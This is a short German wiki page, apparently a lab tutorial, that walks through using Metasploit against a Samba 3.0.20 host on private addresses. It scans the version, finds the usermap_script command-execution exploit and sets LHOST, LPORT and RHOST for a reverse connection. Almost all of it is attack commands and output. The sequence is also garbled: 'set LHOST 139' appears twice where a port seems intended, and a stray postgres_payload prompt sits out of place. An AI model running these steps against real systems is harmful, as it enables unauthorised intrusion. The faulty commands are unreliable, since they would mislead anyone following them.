Metasploit smb exploit

Aus Xinux Wiki
Version vom 19. Oktober 2022, 16:35 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=Gefundene Version= ;<nowiki>[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</nowiki> =Die Information ist zu ungenau, wir boh…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Gefundene Version

[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Die Information ist zu ungenau, wir bohren weiter

  • msf6 > use auxiliary/scanner/smb/smb_version
  • msf6 auxiliary(scanner/smb/smb_version) > show options
  • msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.10.105
  • msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.10.105:445       -   Host could not be identified: Unix (Samba 3.0.20-Debian)

Modul suchen

  • msf6 > search Samba 3.0.20
0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Module laden

  • msf6 > use 0

msf6 exploit(multi/samba/usermap_script) >

  • msf6 exploit(/linux/postgres/postgres_payload) > info

Wir setzen LHOST, LPORT, RHOST und LHOST

  • msf6 exploit(multi/samba/usermap_script) > set LHOST 10.0.10.101
  • msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
  • msf6 exploit(multi/samba/usermap_script) > set RHOST 10.0.10.105
  • msf6 exploit(multi/samba/usermap_script) > set LHOST 139

Und Attacke

  • msf6 exploit(multi/samba/usermap_script) > set LHOST 139
Es dauert ein bisschen